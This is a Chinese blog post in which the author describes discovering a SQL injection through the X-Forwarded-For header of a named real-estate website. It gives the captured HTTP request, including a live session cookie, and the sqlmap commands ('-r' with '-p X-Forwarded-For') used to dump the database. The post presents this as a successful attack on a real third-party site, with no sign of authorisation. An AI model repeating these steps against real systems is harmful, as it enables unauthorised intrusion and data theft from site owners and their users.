昔日

挖掘x-forwarded-for注入

′ 归零:

如何查找这种注入,以前一直也很困惑啊,如果我手工一个一个测试,如果被我遇到了真的是人品大爆发了。问过@小胖子他当时说是可遇不可求的。但是我也不是就这么信了。好了说真题。


xx年xx月xx日我浏览一个网站的时候发现




我当时很震惊,为啥这一进去网站就爆sql注入。后来仔细一看8.8.8.8'的时候,我明白了,就在不久前,我下载过火狐的一个x-forwarded-for然后鬼使神差的在填写ip的地方加了个'

然后就有了当时的一幕




然后我抓包,直接丢sqlmap里面跑。但是我在x-forwarded-for后面加的*被无视了。不是吧,刚好看到zone里面也在讨论,他们提出的方法也是加-p参数、加--level等等,但是我全部测试,都没行。弄的本屌很伤心,只能找朋友@sex is not show帮忙,他说他读出了数据!!!


好了,既然这样那就是我的sqlmap的问题了。本屌当时很纠结了,各种想不通,他使用的是kali系统,但是我使用win下的和bt5下面的都跑不出来。难道是版本太老了?好吧,我去更新了下sqlmap的版本。最后成功注入出来贴下图




-------------------------------------------------------------------------------------------------------------------------------------


-------------------------------------------------------------------------------------------------------------------------------------


利用firebug抓的请求包:


[plain] view plaincopy





  1. GET / HTTP/1.1  


  2.   


  3. Host: hz.zhujia360.com  


  4.   


  5. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0  


  6.   


  7. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  


  8.   


  9. Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3  


  10.   


  11. Accept-Encoding: gzip, deflate  


  12.   


  13. Cookie: PHPSESSID=103a31dd188ed133e3c8db24cf8b0967; Hm_lvt_26ab71a0888a7c7ba96d0e45748d4dc2=1392169618; Hm_lpvt_26ab71a0888a7c7ba96d0e45748d4dc2=1392169618; sgsa_id=zhujia360.com|1392169618587782; sgsa_vt_90977_93493=1392169618586; stat_mac=EF00CEA2771AC60B  


  14.   


  15. X-Forwarded-For: 8.8.8.8  


  16.   


  17. Connection: keep-alive  


  18.   


  19. Cache-Control: max-age=0  





更新sqlmap到最新版:(一定要更新,最新版才支持 -p "X-Forwarder-For")


#./sqlmap.py --update




提交请求包注入:(-p 指定注入参数)


#./sqlmap.py -r httpreqtxt/hz.zhujia360.com.txt -p "X-Forwarded-For"


成功



评论

热度(2)

  1. 昔日′ 归零 转载了此文字